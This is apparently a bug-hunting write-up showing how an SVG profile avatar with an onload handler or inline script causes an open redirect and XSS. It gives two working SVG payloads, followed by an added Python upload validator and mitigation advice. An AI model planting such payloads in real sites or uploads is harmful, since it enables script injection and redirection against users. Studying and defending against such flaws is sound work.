Open redirect & rXSS via profile image
Hello hackers,
In this article, I will demonstrate how I found an open redirect by uploading an SVG image as a profile avatar.
Let’s dive in.
To test for this kind of vulnerability, first create an account on the target. Then go to the profile page and check whether an avatar can be uploaded. Note: check which avatar image extensions the target you are working on allows. Luckily, in my case, the target allowed .svg images.
So I created an SVG file with the following content and saved it as image.svg:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='https://google.com'"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
Head to the profile settings and upload the avatar (image.svg).
After the avatar has been uploaded successfully, open it in a new window and BOOM, you are redirected to the location specified in the onload handler (with the code above, I was redirected to Google).
Cross-site scripting (XSS) via profile image
Now this can also be leveraged to execute rXSS by changing the code to the following:
<svg onload=alert(document.domain)>.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS by noor");
</script>
</svg>
The rest of the steps are the same as for the open redirect. Once you open the avatar image, the alert will pop up!
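Both findings above come down to the same root cause: the application stores an attacker-supplied SVG and later serves it inline, so the browser treats the file as an active document rather than a picture. As an added example (not code from the original post), the Python below is a server-side check that an avatar-upload handler could run before storing an SVG. It rejects the two shapes described in the post (an event-handler attribute such as onload, and an inline <script>), and also external references, DOCTYPE/ENTITY declarations, and style rules that load URLs. The sample SVG strings are constructed for this example; the host names in them are placeholders.

```python
"""Reject SVG avatar uploads that can run script or load external content.

Added example, not from the original post. Intended to run before an
uploaded .svg is written to storage; anything it flags is refused.
"""
import re
import xml.etree.ElementTree as ET

# Element local names that let an SVG run script or pull in active/external content.
FORBIDDEN_TAGS = {"script", "foreignobject", "iframe", "embed", "object",
                  "animate", "set", "use"}
# Attributes that carry a URL; only same-document fragments (#id) are allowed.
URL_ATTRS = {"href"}
# Entity/DTD declarations are never needed for an avatar and are an XXE/DoS risk,
# so they are refused before the bytes ever reach the XML parser.
DOCTYPE_RE = re.compile(rb"<!(DOCTYPE|ENTITY)", re.IGNORECASE)
STYLE_URL_RE = re.compile(r"url\s*\(|expression\s*\(|@import", re.IGNORECASE)


def _local(name: str) -> str:
    """Strip an ElementTree namespace prefix such as '{http://www.w3.org/2000/svg}'."""
    return name.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> list[str]:
    """Return a list of reasons to reject the SVG; an empty list means it passed."""
    findings: list[str] = []
    if DOCTYPE_RE.search(data):
        return ["DOCTYPE or ENTITY declaration present"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _local(root.tag).lower() != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag).lower()
        if tag in FORBIDDEN_TAGS:
            findings.append(f"forbidden element <{tag}>")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                # onload, onclick, onbegin, ... : every on* attribute is an event handler.
                findings.append(f"event handler attribute {name} on <{tag}>")
            elif name in URL_ATTRS and not value.lstrip().startswith("#"):
                # Catches javascript:, data:, http(s): and any other non-fragment target.
                findings.append(f"external or scripted reference in {name} on <{tag}>: {value!r}")
            elif name == "style" and STYLE_URL_RE.search(value):
                findings.append(f"style with url()/expression()/@import on <{tag}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """True only when the upload produced no findings."""
    return not svg_findings(data)


# Constructed samples. BENIGN is the plain rectangle from the post with the
# active parts removed; the others mirror the shapes the post describes.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="300" height="100">
  <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)"/>
</svg>"""

ONLOAD_REDIRECT = b"""<svg onload="window.location='https://redirect-target.invalid/'"
     xmlns="http://www.w3.org/2000/svg">
  <rect width="300" height="100"/>
</svg>"""

INLINE_SCRIPT = b"""<svg xmlns="http://www.w3.org/2000/svg">
  <script>console.log("constructed sample")</script>
</svg>"""

WITH_DOCTYPE = b"""<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>"""

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN), ("onload", ONLOAD_REDIRECT),
                          ("script", INLINE_SCRIPT), ("doctype", WITH_DOCTYPE)]:
        print(f"{label:8} safe={is_safe_svg(sample)} findings={svg_findings(sample)}")
```

A parser-based allow-list like this is only one layer: a simpler and more robust fix for avatars is to rasterize uploads to PNG on the server, or to serve user-supplied files from a separate origin with `Content-Disposition: attachment` so that a browser never renders them as a document on the application's origin.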
I know this can be escalated to RCE and others; however, in my case, they did not work, or maybe I did not have enough time to dig deeper into the target.
Happy hacking y’all